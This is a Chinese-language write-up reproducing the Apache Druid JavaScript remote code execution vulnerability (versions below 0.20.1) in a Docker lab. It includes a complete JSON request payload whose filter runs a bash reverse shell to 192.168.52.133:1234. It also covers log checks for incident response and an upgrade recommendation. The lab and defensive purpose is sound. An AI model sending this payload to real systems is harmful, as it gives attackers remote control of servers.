目录
概述
Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。
在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。
影响版本
Apache Druid < 0.20.1
漏洞复现
环境搭建
在虚拟机安装docker,安装完成后使用以下命令pull漏洞环境
docker pull fokkodriesprong/docker-druid
下载漏洞环境后使用以下命令启动漏洞环境
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
启动后在浏览器访问http://your-ip:8888/看到以下界面表示成功
漏洞复现
在浏览器进入Apache Druid首页如何点击点击左上方Load data -> Local disk按钮
右侧表单填入Base directory:quickstart/tutorial/
File filter:wikiticker-2015-09-12-sampled.json.gz
填入完成点击Preview,然后点击next
打开burp进行抓包,然后一直点击next,直到下一步是Next:Filter时,抓取数据包
然后替换数据包中的data数据为以下代码,然后修改代码中的exec()方法里的命令,这里为反弹shell指令
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.52.133/1234 0>&1')}", "dimension":"added", "":{ "enabled":"true" } }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
应急排查
1、docker logs排查
本环境为docker环境,日志未记录访问日志
2、druid自身调试日志
druid默认的log4j.xml路径为:conf/druid/cluster/_common/log4j2.xml
日志配置可参考:https://cangchen.blog.csdn.net/article/details/117065802?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_default&utm_relevant_index=1
一一查看这些日志文件,未发现有访问路径的入侵痕迹
3、排查需web访问日志,搜索关键字”/druid/indexer/v1/samler?for=filter”
加固建议
1、升级到最新版Apache Druid,下载地址为
https://druid.apache.org/downloads.html